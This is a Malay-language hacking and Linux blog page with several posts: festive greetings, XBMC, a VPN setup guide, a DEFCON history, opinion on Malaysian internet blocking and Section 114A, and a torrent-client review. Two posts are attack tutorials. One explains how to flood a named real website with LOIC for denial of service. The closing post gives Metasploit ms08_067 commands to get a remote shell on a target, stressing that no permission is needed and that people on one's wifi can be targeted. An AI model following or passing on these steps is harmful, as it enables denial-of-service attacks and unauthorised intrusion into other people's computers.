Syukur tak terhingga dirafakkan kepada Allah S.W.T kerana kita tiba jua di penghujung Ramadhan. Bagi mukmin sejati, ini adalah waktu yang paling sedih, pabila tak pasti lagi akan bertemu lagi di Ramadhan tahun hadapan. Namun, apapun jua kita perlu tempuh. Sudah masuk tahun kedua Mr.Hac mengucapkan Salam Idulfitri ini kepada anda semua.
Masih ingat lagi Ramadhan tahun lepas, saya mengalami kemalangan beberapa hari saja lagi sebelum umat Islam menyambut kedatangan Syawal. Alhamdulillah, tahun ini saya sihat wal afiat, blog masih meneruskan kesinambungan dengan penulis jemputan baru dan lama silih berganti memeriahkan entri-entri.
Apa pun, dalam kita menyantuni bulan Syawal yang tiba, jangan dilupa bahawa orang Melayu ini penuh dengan mesej tersembunyi disebalik perbuatan. Setiap apa yang dilakukan, ada maksud, jadi jangan sampai tersilap dalam kita bersuka-ria, sehingga menjadi duda yang minta dipinang segera, apabila salah cara mengikat samping di pagi Hari Raya! (pantun ke ni?)
Cuba lihat gambar di bawah, sumber dari FB Majalah Seni Beladiri, olehGuru Azlan Ghanie:
Jangan lupakan blog ini biar hari raya, hari guru, hari bapa, malah hari-hari pun jangan lupa! Kerana anda blog ini masih belum ‘bungkus’, kerana anda kami masih menyusun jari-jemari di atas keyboard. Heh, lebih-lebih pula..
Mungkin Mr.Hac tidak akan terbitkan entri esok kerana akan pulang berhari raya di kampung, jadi entri ini menyusul lebih awal, sebab tak kan pagi raya pun nak buka blog OMG! Hackers? lagi kan?
Eh, dah nak raya ni, duk depan PC apa ke-jadah-nya?
Jom cari lemang! Cari rendang! Cari jodoh! Hoi, nak cari gaduh? (dengan bini).
Ollleeeyyy! Selamat Hari Raya, Maaf Tenaga Zahir dan Tenaga Batin! Tenaga Nasional! Berhad! (sudah..sudah..entri ini tamat di sini ya..).
Seperti mana yang para pembaca ketahui (pembaca lama), saya memang sangat menyukai pemain media semua dalam satu, hub hiburan pada PC ini, iaitu XBMC. Kalau setiap kali pasang Ubuntu atau distro Linux terbitan darinya seperti Linux Mint, elementary OS dan lain-lain sepertinya, tidak sah kalau XBMC tidak bertapak di dalamnya.
Khabar gembira buat pengguna telefon bimbit pintar yang dikuasakan dengan Android, kini XBMC boleh didapati dan dipasang pada peranti anda! Lihat paparan skrin di bawah (HTC One X):
Buat mereka yang masih tidak tahu apa itu XBMC, ia adalah sebuah pemain media semua dalam satu yang merangkumi video, audio dan gambar. Anda boleh tukarkan PC anda kepada pemain media berfungsi penuh dengan menguasakan ia melalui pemasangan XBMC. Super duper cool!
Sila ambil perhatian, ia masih belum stabil, jadi mungkin terdapat beberapa bugs dan sekiranya anda tidak mahu berdepan dengan bugs yang menjengkelkan, adalah disaran supaya anda menanti rilisan stabil. Namun buat yang tidak sabar atau penuh dengan keinginan untuk mencuba, silakan! Tambah nasik!
Sebelum ini saya pernah membuat beberapa pos mengenai Ubuntu One. Ia sememangnya storan awan yang menarik, dan kini ia bertambah menarik lagi apabila ia memperkenalkan pautan rujukan, yang boleh digunakan untuk memperluaskan lagi saiz storan.
Dengan setiap satu rujukan yang diperoleh melalui pautan tersebut, anda akan mendapat ekstra saiz storan sebanyak 500MB, dan ia dapat diperluaskan sehingga 20GB, menjadikan total saiz sebanyak 25GB (termasuk saiz storan asal, 5GB). Bukan anda seorang sahaja yang mendapat ekstra storan, tetapi mereka yang mendaftar menggunakan pautan rujukan anda juga memperoleh manfaat yang sama.
Anda tidak perlu berfikir lama sebelum mendaftar, kerana Canonical dan Ubuntu sememangnya sudah kukuh. Jadi anda boleh jangkakan Ubuntu One untuk ‘berada lama’ dalam arena storan awan, dan bersaing dengan laman storan yang lain. Buat mereka yang belum menggunakan Ubuntu One, anda boleh daftar dengan menggunakan pautan rujukan dari akaun saya : Register : Click Me Baybehhh
Salam dan selamat sejahtera. Bulan puasa yang kini semakin
menutup tirai. Pasti nya ia akan menjadi sejarah seperti sejarah – sejayah yang terdahulu. Bercakap mengenai sejarah ni,
tak ramai yang tahu akan sejarah mengenai Hack . Kali ini th3bAdh off topic dahulu
mengenai hack dan backtrack. Mari kita baca satu tajuk yang boleh dikatakan
hebat juga la dalam dunia hack-hack ni iaitu Defcon.
Pelikkan bunyi nnya. tapi bagi yang mengikuti dunia ni atau
yang dah tahap Otai, adalah suatu perkara biasa, defcon ini adalah satu
perjumpaan hacker tidak kira lah dari kalangan software engginer, penjenayah
siber, pengkaji keselamatan, pakar pengubahsuaian hardware, cracker, CEO
dan pelbagai lagi jenis manusia yang
tahap gila baban, asal kan ianya boleh di “hack”. Perjumpaan ini
diadakan setiap tahun di Las vegas,Nevada
Pasukan Sudoes sedang bertanding di dalam Pertandingan Capture the Flag hacking pada perjumpaan DefCon di Las Vegas.
Apa yang diorang buat masa perjumpaan tu?. Inilah perkara
yang paling menarik semua orang sehinggakan Agensi-agensi perundangan seperti
FBI, Dod (Jabatan Pertahanan Amerika) dan macam –macam lagi la. Pendek kata, ia
bukan perjumpaan yang calang-calang sehinggakan ada orang yang dikenakan
tindakan undang-undang. Diorang ni akan berkumpul dan akan membincangkan,
membentangkan teknologi, sejarah, dan semestinya vulrn /exploit terbaru yang
belum pernah didedahkan/dibincangkan kepada media-media lain. Walaupun ianya
adalah berkaitan “hack” tapi pelbagai acara yang diadakan semasa DEFcon ini,
macam pertandingan ‘’lockpicking”,pertandingan cipta robot, seni dan logo dan
Capture The Flag/ Menangkap Bendera. Acara menagkap bendera ni lah yang paling
hangat sekali. Ianya adalah pertandingan serang dan bertahan menggunakan
perisian dan struktur rangkaian . Kat Malaysia ini th3bAdh ada juga pernah
hacking confrence tapi senyap je…tak ber kesan ke ape…hehehe..jangan marah
Pertandingan CTF pada Defcon 17
Defcon pada mula nya hanyalah diadakan semata untuk ucapan
selamat tinggal, Iaitu Jeff Moss (pengasas
defcon) pada tahun 1992 kerana pemergian rakan-rakan dan geng-geng hekes ke luar negara, tapi selepas parti itu
diadakan, Kawan- kawan nya sentiasa mendesak sehinggalah ia dijadikan Acara
tahunan. Walaupun ianya hanyalah pembetangan, tetapi terdapat juga insiden yang
berlaku seperti Dmitry Sklyarov programmer
dari Rusia, di tahan kerana munulis program yang memecah format Adobe dan
banyak lagi-lagi insiden yang berlaku pada DEFCON, tapi diorang ni tahap
proffesional, kena saman pon, berjuta syarikat nak ambil sebagai perkerja. Kalau
kat Malaysia ni, tunggulah polis datang rumah anda, dan bersiap untuk penjara
kerana menguji sistem diorang..hehehe..
Adam Savage dari “mythbuster” memberi ucapan motivasi pada Defcon 17
Daripada Defcon inilah, banyak tool/exploit yang terhasil/dilepaskan/diperkenalkan kepada kita seperti MiTM, SET, SSLstrip, Evilgrade,dan
macam –macam lagi. Nak tahu lebih lanjut boleh pergi ke Laman rasmi Defcon. Video-video perjumpaan Defcon boleh ditonton di Youtube
Ribuan terima kasih diucapkan kepada anda yang telah banyak membantu untuk meningkatkan lagi mutu penulisan wa. Artikel ini tidak mengeluarkan setitik peluh pun bagi wa kerana segala ilustrasi dibawah adalah di salin dan tampal di laman rasmi SecurityKISS. Wa hanya menggunakan otak untuk berfikir akan ayat yang mudah dan menggunakan tangan untuk menaip.
Apa itu SecurityKISS?
Memang sengaja wa tidak memberitahu akan apa yang dimaksudkan dengan SecurityKISS pada tajuk penulisan wa kali ini . Berbanding yang wa jelaskan pada entri wa sebelum ini seperti LOIC Untuk Ubuntu [Bah. 1 & 2]. Kata anda seorang hacker. Takkan LOIC pun tak tahu? Dan Tixati: ‘Torrent Client’ Terbaik. Secara terang wa jelaskan kepada anda apa itu Tixati. Melainkan anda bukan pengguna torrent dan tak pernah ambil tahu akan torrent yang membuatkan anda tidak akan tahu tentang torrent.
SecurityKISS merupakan VPN (Virtual Private Network). Tidak perlu wa terangkan apa itu vpn kerana tuan Arya telah menerangkan dengan jelas tentang vpn Lihat artikel karangan beliau Apa Itu VPN? dan Apa Itu VPN [Bah. 2]. SecurityKISS juga menyokong sistem operasi lain seperti Windows,Mac dan sudah semestinya Linux. Bukan sahaja menyokong tiga sistem operasi yang hebat ini malah juga menyokong Android,Iphone & Ipad,Windows Mobile dan DD-WRT,Tomato. Sebelum wa menerangkan dengan lebih dalam lagi mengenai SecurityKISS ini. Wa ambil kesempatan untuk memberitahu bahawa apabila anda menggunakan SecuriyKISS ini peluang anda untuk melakukan penstriman video di Youtube dan pelbagai laman yang membekalkan video adalah 3/10. Begitu juga jika anda pengguna torrent maka peluang untuk anda mengkaburkan identiti anda dari pandangan sembarangan orang ialah sebanyak 0%. Tetapi kelebihan yang ada apabila anda menggunakan SecurityKISS ini di Linux anda akan mendapati proses belayar di alam maya tidak terlalu lambat. Kira baguslah tu kerana tiada apa-apa perasaan geram sewaktu mengunjungi laman sosial,blog dan laman ilmu khususnya laman OMG! Hackers?. Identiti pun terjaga.
Kelebihan apabila menggunakan SecurityKISS.
– Percuma untuk selamanya. Ini yang akan dibincangkan oleh kita. Jika anda menggunakan SecurityKISS secara percuma anda akan menerima 300MB bandwidth/day. Kenapa wa letakkan pada kelebihan bukannya kekurangan?
– Sekuriti tahap 1024-bit
– Sangat mudah untuk digunakan
– Tiada iklan,100 bebas daripada iklan yang menyerabutkan fikiran.
– Dan banyak lagi.
Pendaftaran ahli. Langkah 1. Kunjungi laman rasmi SecurityKISS disini.
Langkah 2. Scroll dan dapatkan kalimat yang tertulis “DOWNLOAD SecurityKISS Tunnel”
Langkah 3. Sekiranya anda menggunakan Linux,secara automatik anda akan dibawa ke ruangan Linux begitu juga apabila anda menggunakan Windows dan Mac. Disebabkan tutorial ini untuk Ubuntu,maka ke Linux lah anda akan dibawa.
Langkah 4. Masukkan e-mail anda di ruangan yang disediakan dan klik Send. Dan anda akan mendapati bahawa anda sudah terdaftar dengan perkhidmatan mereka. Lihat gambar 2.
Langkah 5. Periksa e-mail yang dihantar kepada anda. Pada e-mail tersebut tertera Client ID,Password dan tiga buah server untuk anda. Sekiranya anda tidak mendapat sebarang e-mail dari pihak SecurityKISS di peti surat (inbox) anda sila periksa pada bahagian ‘spam’. Selesai
Langkah 4. Point-To-Point Tunnelling Protocol (PPTP) dan klik Create…
Langkah 5.
Berikan nama untuk sambungan vpn anda pada ruangan ‘Connection name’. Cth:- SecurityKISS-Rakyat Siber.
Jika anda berminat untuk memulakan sistem operasi anda bersama sambungan vpn,tandakan pada ruangan ‘connect automatically’.
Log masuk ke dalam akaun e-mail anda dan dapatkan Gateway (server yang diberikan. Cth:- USA,UK,Ger). Dapatkan juga Username (client ID) dan password pada e-mail tersebut. Masukkan pada ruangan dalam ruangan yang disediakan.
Klik Advanced…
Langkah 6. Selepas anda klik Advanced… Anda akan mendapati satu tetingkap (window) akan keluar. Anda tandakan pada Use Point-to-Point encryption (MPPE) dan klik OK. Klik Apply menutup tetingkap yang berkenaan.
Kaedah menyambung ke rangkaian vpn SecurityKISS.
Klik sambungan internet anda. Pilih VPN Connection dan hubungkan ke rangkaian vpn anda.
Sekiranya sambungan anda berjaya maka pada sambungan internet anda tertera ikon ‘mangga’ (bukan buah mangga,faham-faham jelah)
Langkah 2. Masukkan client ID dan password anda. Klik login.
Langkah 3. Sewaktu anda menerima mesej daripada pihak SecurityKISS anda hanya dibekalkan dengan tiga server pilihan. Sekiranya anda berminat untuk menggunakan server dari negeri dan negara lain anda cuma perlu pergi ke tab Servers dan pilih PPTP.
Sebelum apa-apa, muat turun dahulu (kalau masih belum) e-buku Anonymous Surfing : Klik
Al-kisah, Malaysia telah melaksanakan sekatan internet terhadap beberapa laman web perkongsian fail (yang sebahagian darinya memang dah ‘bungkus’). Antaranya Megaupload, Megavideo, Putlocker, Fileserve dan lain-lain lagi. Tujuannya? Untuk menghalang aktiviti penyebaran fail yang tidak sah di sisi Undang-undang atau melanggar Hak Cipta pemilik asal.
Sekatan internet sebenarnya bukanlah perkara baru. Malaysia juga bukan negara pertama yang menjalankannya. Sebelum ini, negara China telah terlebih dahulu mengenakan sekatan internet yang amat dahsyat kepada rakyatnya sehinggakan laman enjin carian Google juga tidak dapat dibuka! Sekatan ini terkenal dengan gelaran The Great Firewall of China. Serius, sekatan ini memang saya tidak faham tujuannya!
Di pejabat-pejabat kerajaan, sekatan lebih dikenakan kepada laman-laman sosial seperti Faebook, dan juga laman penstriman video seperti Youtube. Bagusnya, ia memang membantu produktiviti. Tetapi… bagi saya lebih banyak buruk dari baiknya.
Baiklah, mari kita lihat dan bincangkan sedikit-sebanyak mengenai kelebihan dan kekurangan sekatan internet. Semoga dengan terbitnya entri ini, dapatlah ia membuka mata orang-orang ‘di atas’ sana supaya kembali berfikir demi kepentingan dan faedah semua orang.
Mari kita buka perspektif, dari sudut jenis laman web yang disekat. Laman yang patut dikenakan sekatan, sudah semestinya laman-laman web lucah, judi, keganasan, penyebaran agama selain Islam, dan juga laman berbentuk penipuan. Apa yang berlaku di negara kita ini, laman-laman perkongsian fail ‘ditutup’ dari dilawati oleh pengguna internet. Untuk pengguna baru (newbie), apa yang bagusnya ialah ia membantu mereka dari tertipu dengan fail-fail yang mengandungi virus atau keylogger, RAT dan apa-apa fail yang menunggu masa untuk dijalankan (execute) oleh penggodam. Bagi para karyawan, sekatan ini membantu mereka dalam menghasilkan karya bermutu, dan para peminat membeli produk asli dari kedai muzik dan video. Iya ke?
Bagaimana pula dari perspektif pengguna pakar (power user)? Sekatan seperti ini:
1. Tidak membawa apa-apa kesan kepada mereka kerana mereka pasti mencari ‘jalan belakang’.
2. Pengguna muda remaja dengan darah muda, sudah pasti akan memberontak. Buktinya lihat saja kepada aktiviti penggodaman yang dilakukan oleh krew-krew penggodam selepas sekatan dijalankan. Gempak dan gegar satu negara dibuatnya, apabila sekatan ini ditentang dengan keras dalam dunia maya. YA, mereka memang tidak menang apa-apa, tetapi jangan lupa tangan merekalah yang akan mengundi anda suatu hari nanti. Bukan janji tapi pasti.
Sekatan ini bukan sahaja menyebabkan kacau-bilau dalam dunia internet, tetapi bakal melahirkan penggodam-penggodam baru di kemudian hari. Tidak percaya? Begini carta alirnya:
Apabila sekatan internet dijalankan, kebanyakan pengguna baru berasa tertekan dengannya. Ini mengakibatkan mereka juga berusaha dengan sesungguh hati mencari ‘jalan belakang’ untuk keluar dari kebuntuan masalah. Ya, sekatan bukan satu perkara yang menyeronokkan! Setelah puas mencari dan jumpa pula dengan jalan belakang tersebut, adakah mereka akan berhenti di situ sahaja? Tentu tidak. Pasti selepas itu mereka akan mencari pula jalan belakang B, jalan belakang C, dan juga Jalan Haji Taib. Err.. ke lorong?
Jadi bagaimanakah penyelesaian relevan?
Saya memandang perkara ini perlukan waktu yang panjang untuk diselesaikan, bukan dengan mengenakan sekatan dan Undang-Undang yang dirangka secara tidak tentu hala. sebagai langkah pertama, daripada kita kenakan sekatan, adalah lebih baik untuk kita:
1. Mewujudkan kesedaran kepada masyarakat mengenai betapa pentingnya membeli produk asli secara berperingkat. Saya faham, sukar untuk kita galakkan orang kita membeli produk asli, terutamanya mudah pada zaman ini untuk muat turun lagu-lagu dan album penuh secara percuma. Tetapi saya sendiri, selepas berpuas hati dengan lagu-lagu yang telah didengari sesudah selesai memainkannya, saya akan pergi ke kedai muzik berhampiran dan membeli album asli, hanya dengan satu tujuan, kerana saya sukakan muzik dan bunyi yang asli dari CD! Bagaimana nak menggalakkan ‘tabiat’ seperti ini? Satu saja caranya, kurangkan harga! (boleh atau tidak bukan terletak di tangan saya).
2. Mewujudkan kesedaran dan juga penyebaran maklumat ilmiah berkenaan virus, keylogger, RAT, ancaman penggodam serta kaedah-kaedah asasnya seperti Phishing, Tab Nabbing dan sebagainya. Ini lebih baik dari kita ‘buta-buta’ mengenakan sekatan, kerana setiap sekatan itu pasti lebih menggalakkan pengguna akhir ini untuk mencari jalan keluar. Mereka bukan peduli dengan virus, asal saja dapat muat turun dari laman yang disekat!
3. Menyediakan infrastruktur IT di mana-mana, seperti kemudahan WiFi berkelajuan tinggi percuma (seperti di negara Korea). Ini penting, supaya rakyat terbiasa dengan ‘suasana IT’, dan tidak janggal menggunakan komputer serta gajet. Saya berasa sedikit terkilan, kerana ada juga sesetengah dari sahabat-sahabat saya yang masih lagi buat IT. Dalam erti kata lain, kalau ada perkara yang mereka pandai sekalipun, cuma buka Internet Explorer dan Microsoft Word. Buka yang lain, hancur! Saya faham juga, kerajaan perlu berbelanja besar untuk perkara ini, tetapi kalau dilaksanakan secara berperingkat dan perlahan-lahan, bagus juga bukan?
Bagaimana pula dengan pendapat anda? Minta dilontarkan sahaja semua pendapat, agar dapat sama-sama kita fikirkan apa yang baik untuk anak watan.
Bagi
yang tidak mengetahui akan pindaan tersebut, Seksyen 114A, berikut
merupakan penerangan ringkas yang disediakan pihak CIJ Malaysia:
Seksyen
114A menganggap individu yang memiliki laman web atau peralatan
komputer yang mengandungi bahan berunsur hasutan atau fitnah bersalah
walaupun bahan itu dimuat naik oleh pihak lain. Individu atau organisasi
yang mengendali atau menawarkan perkhidmatan kepada forum, blog,atau
laman web juga bertanggungjawab terhadap segala kandungan yang terdapat
pada perkhidmatan tersebut. Para pengguna internet yang akaun atau
komputernya digodam (hack) juga akan dipertanggungjawabkan ke atas bahan
yang dimuat naik oleh penggodam (hacker). Seksyen 114A ini mengancam
kebebasan bersuara di Internet dan menggugat prinsip asas keadilan,
demokrasi dan hak asasi manusia.
Melalui Internet Blackout Day tersebut kelak, CIJ mensasarkan untuk para pembangun web memaparkan pop-up
pada laman web mereka selama lebih kurang 24 jam pada 14 Ogos kelak,
untuk mendidik para pengguna, dan bukannya lebih kepada menutup terus
halaman web seperti yang dilakukan oleh Wikipedia baru-baru ini.
Pindaan terbaru ini meletakkan beban membuktikan kesalahan pada pihak yang dituduh dan bukannya pihak yang menuduh.
Sebagai
contoh, jika seseorang menyamar sebagai anda dan melakukan kesalahan di
internet, andalah yang bertanggungjawab untuk membuktikan bahawa anda
tidak bersalah.
Undang-undang yang baru ini jelas bercanggah
dengan prinsip asas keadilan yang menyatakan bahawa seseorang itu tidak
bersalah selagi tidak dibuktikan kesalahannya.
Pindaan yang baru
ini boleh mendatangkan kesan-kesan yang negatif kepada seluruh pengguna
internet dan pihak yang terlibat dalam industri tersebut.
Jika
anda memiliki akaun Facebook, Twitter, blog atau forum, anda akan
dipertanggungjawabkan atas setiap isi kandungan yang terdapat di
laman-laman tersebut termasuk komen dan artikel yang ditulis oleh pihak
lain.
Selain itu, pembekal perkhidmatan wifi juga akan dikenakan
tindakan jika ada pihak yang menyalahgunakan perkhidmatan tersebut.
Lebih malang lagi, jika rangkaian wifi rumah anda dicuri atau dihack,
anda juga bertanggungjawab atas segala yang dilakukan oleh pencuri
terbabit.
Jika ada pihak yang mencipta akaun Facebook, Twitter
atau emel menggunakan nama anda, Seksyen 114a yang baru ini menganggap
bahawa andalah pemilik sebenar akaun terbabit.
Akta yang baru
dipinda ini sebenarnya bertujuan untuk menakut-nakutkan rakyat daripada
mengemukakan pendapat mereka di internet. Hal ini juga mengancam
kebebasan berinternet di negara kita.
Kebebasan bersuara serta kebolehan menyatakan pendapat merupakan tunjang sebuah demokrasi yang berfungsi dan berinovasi.
Seksyen 114a Akta Keterangan ini jelas bercanggah dengan konsep hak asasi manusia dan aspirasi ekonomi negara berasaskan ilmu.
Jika
anda fikir pindaan terbaru terhadap akta ini perlu dihapuskan, marilah
bersama kita mendesak Kerajaan supaya menarik semula pindaan tersebut.
Sertai Hari Internet Blackout 14 Ogos 2012!
Adakah anda seorang kaki torrent yang tegar? Jika ya. Mungkin anda pernah dengar atau terbaca akan kebolehan Tixati yang tersembunyi. Sejak akhir-akhir ini keperluan untuk mendapatkan barang ‘crack’ melalui laman perkongsian fail agak susah gara-gara hebohnya akan akta sekatan kebebasan di internet. Siapa yang tidak kenal akan akta SOPA (Stop Online Piracy Act)? Akta ini yang berjaya menggemparkan seluruh pelusuk dunia. Tapi sekarang sunyi sepi. Tapi bagi rakyat Malaysia anda masih tidak boleh gembira lagi kerana dengar khabar ada satu akta yang digubal oleh kerajaan Malaysia. Seksyen 114A Akta Keterangan 2012 diberi nama. Tujuan akta ini ialah sama seperti SOPA iaitu menyekat kebebasan belayar di alam maya.
Teruskan kepada tujuan sebenar kita iaitu mengenai Tixati. Daripada pemerhatian wa tentang Tixati ini. Wa mendapati Tixati merupakan sebuah ‘torrent client’ yang terbaik. Tanpa memerlukan sebarang aplikasi booster (bantuan kelajuan seperti Utorrent Booster) ataupun ‘tweak’ (merubah apa-apa seperti tutorial menambah kelajuan pada Utorrent yang di bicara hampir di seluruh pelusuk dunia melalui perantaraan blog dan laman sosial).
Tixati juga sudah mengeluarkan versinya yang terbaru iaitu versi 1.91. Lupa untuk diingatkan cross-platform/multi-platform yang dinyatakan disini ialah hanya disediakan untuk sistem operasi Windows dan Linux sahaja. Satu kerugian untuk mereka yang menggunakan sistem operasi Mac OS.
Mari kita lihat ciri-ciri atau kelebihan pada torrent client Tixati versi 1.91:-
extremely large transfers containing up to 50,000 individual files can be processed smoothly
transfers with very high piece counts (hundreds of thousands) are fully functional
extended meta-info size limits and improved meta-info download and upload algorithms
DHT IPv6 query rate-limiting is now much more accurate, compensates for wide 6to4 ranges
better overall DHT flood-protection heuristics to prevent wasting outgoing bandwidth
piece selection algorithm now compensates for de-selected files on remote peers
more permissive magnet link processing that tolerates encoding errors and bad attributes
new transfer filename processing handles overly-long names much better, avoids creating duplicates
improved peer connection/disconnection algorithms, shorter early retry delays under high demand
seeding ratio/count stop is now delayed until any active move/alloc/checking completes
better shell file and link association control
main bandwidth graphs now display channel traffic in a different color
chat views can now have their font changed separately (Settings> User Interface > Fonts)
freshly gathered channels are displayed in a distinct color
incoming private messages show the time received in the window caption and text tooltip
outgoing channel streams can be created from a .ts or .mp3 file (create a channel and type /streamout)
full-featured playlist interface for outgoing streaming that can be used to create a regular schedule
outgoing stream hashing is now 5x faster on 64-bit Windows machines, matching Linux performance
outgoing stream file hashing can be pre-cached, greatly reducing CPU requirements to originate streams
more intelligent connection rotation algorithms that better account for channel streams
channel permission issuance has much longer time to live, easing maintenance on large channels
better stream playback scheduling to smooth out hiccups on some older media players
further RSS compatibility fixes to support feeds that are severly broken or misconfigured
IP-Location tables have been updated from all five regional registries, up to 2012-08-09
numerous optimizations have been done in the GUI, greatly reducing flicker and CPU usage
many other minor fixes and improvements have been made throughout the program
Hasil ‘copy-paste’ dari laman rasmi Tixati. Gambar di bawah juga adalah hasil copy-paste dari laman rasmi mereka.
Anda juga boleh mengubah warna tema Tixati kepada sebarang warna.
Langkah 1. Klik ‘Setting’ pada toolbar Tixati dan ubahsuailah mengikut kehendak anda.
p/s: Sebarang kesilapan fakta bolehlah dijelaskan pada ruangan komen dibawah. Ampun maaf diminta sekiranya entri ini kurang pengisian khususnya kepada Tuan Arya.
Bertemu lagi kita pada hari ini,dengan buku yang baru dan minda yang terbuka,yang sudah bersedia untuk menerima satu ilmu baru. Entri ini ialah kesinambungan dari entri sebelum ini. Klik disini sekiranya anda belum baca atau tidak sempat untuk membaca apa yang tertulis dan ditulis oleh wa.
Sebelum ini wa ada menerangkan proses pemasangan mono iaitu perisian/alat yang bakal digunakan untuk membuka/menggunakan LOIC pada Ubuntu tanpa Wine. Jadi,entri ini bakal menerangkan cara penggunaan LOIC pada Ubuntu.
Langkah 1. Muat turun LOIC pada laman Sourceforge.net. [klik sini].
Langkah 2. ‘Extract’ fail .zip LOIC. Sebaik-baiknya dilakukan di ‘desktop’ sistem operasi Ubuntu anda. Wa menggunakan Xubuntu 12.04.
Langkah 3. Anda akan mendapati bahawa terdapat fail LOIC.exe pada ‘desktop’ anda.
Langkah 4. Klik kanan pada fail LOIC.exe dan pilih Open With “Mono Runtime”
Kaedah penggunaan LOIC.
Langkah 1. Masukkan sebarang alamat laman sesawang pada ruangan “URL”. Contoh laman yang digunakan disini ialah http://megaupload.com/. Sekiranya anda mengetahui alamat IP sesebuah laman sesawang itu maka anda boleh juga masukkan alamat IP di ruangan “IP”
Langkah 2. Klik Lock on.
Langkah 3. Pilih kaedah apa yang akan anda gunakan TCP,UDP dan HTTP. Kebiasaannya mereka menggunakan HTTP.
Langkah 4. Masukkan apa sahaja angka mengikut kadar kekuatan komputer anda pada ruangan ‘Threads’. Contoh, 50. Tapi yang memberi ‘respond’ hanyalah belasan sahaja.
Langkah 5. Klik IMMA CHARGIN MAH LAZER yang bermaksud tunggu apa lagi kasi pecahlah,kasi pecahlah.
Langkah 6. Perhatikan pada ruangan Failed. Semakin banyak angka yang ditunjukkan semakin lemahlah laman itu. Lagi bagus jika ruangan downloader dan request tidak memberi apa-apa sebarang tindakbalas.
Klik untuk perbesarkan.
Disebabkan entri pertama wa mendapat pujian serta kelebihan. Maka,tidak perlu lagi wa tulis “sila berikan komen dan pendapat anda tentang penulisan wa”
th3bAdh pernah membaca artikel tentang metasploit di OMG! Hacker yang dikarang oleh Abg Saki, dan macam ada sesuatu yang tertinggal pada artikel tersebut, Jadi tutorial pada kali akan menyambung sedikit tentang Metasploit, bagi yang belum baca sila dapatkan kan kefahaman terlebih dahulu atau boleh rujuk disini,(karangan Abg Saki)
Seperti yang anda tahu, Metasploit adalah salah satu tool yang sangat popular pada semua peringkat tidak kira lah dari tahap Professional sehingga ke tahap Script Kiddie kerana ianya menggunakan baris perintah yang mudah dan menjimat kan masa bagi penguji keselamatan.
Jadi apakah yang dimaksudkkan Remote Exploit yerk?
Remote Exploit dari pemahaman aku, bermaksud mengawal atau menghantar exploit secara jauh (kalau salah betulkan..hehehe)
Kelebihan nya
1. Tidak perlu mendapatkan akses/kebenaran untuk menggunakan komputer itu (bermakna kita boleh target sapa-sapa je terutama orang yang menggunakan wifi kita…heheh
2.Boleh hack komputer luar dari LAN kita (aku tak pernah berjaya lagi hehehe..)
Kekurangan nya
1. Tidak semua komputer boleh dihack (bergantung kepada vuln yang terdapat di dalam komputer tersebut, antara yang paling sukar tembus Windows 7, tapi tak semestinya tak boleh tembus)
2. Firewall sekarang menyebabkan sukar untuk tembus,
3. Perisian anti virus menyekat dan melaporkan ianya sebagai Trojan
Jadi anda sudah faham sedikit apa yang dimaksudkan dengan Remote Exploit. Sekiranya masih lagi tidak faham, th3bAdh berasakan anda tidak lagi boleh meneruskan dengan bacaaan seterusya, kasi faham dahulu yerk.
Bagi remote exploit ini, ianya sedikit rumit bagi permulaan, kerana tidak semua komputer mempunyai vurln/zero day , jadi bagi tujuaan pembelajaran, th3bAdh syorkan anda bermula dengan menguji Windows XP SP1 atau Windows Server 2003 kerana ianya ianya terdapat perlbagai bug. th3bAdh tidak galakkan untuk menguji dengan Windows 7 kerana sistem keselamatan yang baik menyebabkan ianya sukar digodam.
Macam mana nak mula
buka terminal dan taip
msfconsole
tunggu sehingga ia selesai load
kemudian, taipkan
use windows/smb/ms08_067_netapi
taip
set RHOST 192.168.1.13
penerangan –
RHOST – adalah target IP mangsa
kemudian
exploit
sekiranya ianya seperti dibawah, bermakna anda telah berjaya.
Meterpreter session 1 started ….Binggo!
Jadi, itu adalah serba sedikit tentang Remote Exploit, sekiranya anda tidak berjaya, pastikan anda memulakan pengujian pada Windows XP SP1 terlebih dahulu. Nantikan tutorial backtrack akan datang.
